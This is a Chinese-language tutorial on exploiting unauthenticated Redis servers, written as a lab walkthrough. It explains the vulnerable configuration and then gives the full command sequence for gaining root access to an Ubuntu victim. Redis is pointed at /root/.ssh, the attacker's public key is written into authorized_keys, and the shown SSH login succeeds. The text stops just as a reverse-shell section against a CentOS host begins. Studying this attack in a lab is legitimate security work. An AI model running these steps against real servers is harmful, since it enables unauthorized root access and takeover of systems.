Redis未授权访问漏洞

Redis是一种key-value键值对的非关系型数据库

默认情况下绑定在127.0.0.1:6379，在没有进行采用相关的策略，如添加防火墙规则避免其他非信任来源ip访问等，Redis服务将会暴露到公网上，以及在没有设置密码认证的情况下，会导致任意用户在可以访问目标服务器的情况下进行未授权的访问Redis

Redis还支持本地存储，也就导致任意文件写入，攻击者在未授权访问以root身份运行的Redis时可将ssh公钥写入目标服务器/root/.ssh文件夹的authotrized_keys 文件中，进而通过对应私钥直接登录目标服务器

漏洞的产生条件：

1. Redis绑定在127.0.0.1:6379，且没有进行添加防火墙规则避免其他非信任来源ip访问等相关安全策略
2. 没有设置密码认证，可以免密码远程登录Redis服务
3. 以root身份运行Redis

Redis简单命令了解

查看版本信息
127.0.0.1:6379> info
清空所有Redis数据库的所有key 慎用
127.0.0.1:6379> flushall
设置Redis本地存储的文件夹和文件名
127.0.0.1:6379> config set dir [PATH]
127.0.0.1:6379> config set dbfilename [FILENAME]
将当前Redis实例所有数据快照以RDB文件的形式保存到硬盘
127.0.0.1:6379> save

Redis.config简单配置了解

bind IP1 IP2 ...

bind表示本机可以接受连接的网卡地址；只有通过bind里面配置的IP才访问到Redis服务

protected-mode [no|yes]

设置protected-mode no此时外部网络可以直接访问；开启保护模式需配置bind IP或者设置访问密码

漏洞环境

Attacker

Kali: 10.173.168.12

Victim

Ubuntu: 139.xxx.xx.xxx

CentOS: 10.173.168.6

修改redis.conf

# bind 127.0.0.1
protected-mode no

需要允许除本地外的主机远程连接redis服务

利用Redis实现SSH

Victim: Ubuntu

root身份运行Redis服务器

$ sudo redis-server /etc/redis.conf

Attacker本地生成一堆密钥

root@kali:~# ssh-keygen -t rsa

id_rsa.pub

root@kali:~/.ssh# cat id_rsa.pub 
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDxjYQf2AMNmfzla+Vi7zJdJWn2OB5jW8EZ5rxAtvIear3BS6JfJ197HyiAqGkMRnb/Y5F//0yJ+Amx1+eo2deUYRo/DfUuIQeRipitysNF2lxhKhBdk4O+L4QuuLqeIf0pg9dB0zSVmnThlwTo9P21V8hIXVWozmaEV8j+hb+SCFN50mqPfnQ0Wmkq3A1QTLkvLJI/EzWFqzNc46/re7Dvs05hs1kmioDFG+gsx75z3WI98g8eW/C8SWLZ3F9cV36ZeNspmqrrKCxKwZxoaOAHA+ZdOF3SkGa0FRG/pbLgV3djDv9yfNgmaqilzR7CQblaBHnuSY/AZLxF49drV+pCtuOd9Lh6g7d7PwoxaOJyIjhsf2g9bDm7IrrSsWMtkOkMg883ge/ow5TVRZLFugvRRy+yb2loiXIGd3hodvN5c7g709WlbVBhvXYMFxfPYEe/gglcoPmaB23647uDvBAbn8JhAeTw2RVqqJxCziabVaWg2MM3Tb6xK2yszrrSPrs= root@kali

Redis连接并将公钥写入Victim

root@kali:~/.ssh# redis-cli -h 139.xxx.xx.xxx
139.xxx.xx.xxx:6379> config set dir /root/.ssh
OK
139.xxx.xx.xxx:6379> config set dbfilename authorized_keys
OK                                                                                                                                                                                                                                         
(0.54s)                                                                                                                                                                                                                                    
139.xxx.xx.xxx:6379> set x "\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDxjYQf2AMNmfzla+Vi7zJdJWn2OB5jW8EZ5rxAtvIear3BS6JfJ197HyiAqGkMRnb/Y5F//0yJ+Amx1+eo2deUYRo/DfUuIQeRipitysNF2lxhKhBdk4O+L4QuuLqeIf0pg9dB0zSVmnThlwTo9P21V8hIXVWozmaEV8j+hb+SCFN50mqPfnQ0Wmkq3A1QTLkvLJI/EzWFqzNc46/re7Dvs05hs1kmioDFG+gsx75z3WI98g8eW/C8SWLZ3F9cV36ZeNspmqrrKCxKwZxoaOAHA+ZdOF3SkGa0FRG/pbLgV3djDv9yfNgmaqilzR7CQblaBHnuSY/AZLxF49drV+pCtuOd9Lh6g7d7PwoxaOJyIjhsf2g9bDm7IrrSsWMtkOkMg883ge/ow5TVRZLFugvRRy+yb2loiXIGd3hodvN5c7g709WlbVBhvXYMFxfPYEe/gglcoPmaB23647uDvBAbn8JhAeTw2RVqqJxCziabVaWg2MM3Tb6xK2yszrrSPrs= root@kali\n\n\n" 		# \n换行，不然SSH连接会失败
OK                                                                                                                                                                                                                                         
139.xxx.xx.xxx:6379> save
OK

SSH连接Victim

root@kali:~/.ssh# ssh -i id_rsa [email protected]
Welcome to Ubuntu

利用Redis实现反弹Shell

Victim: CentOS

root身份运行R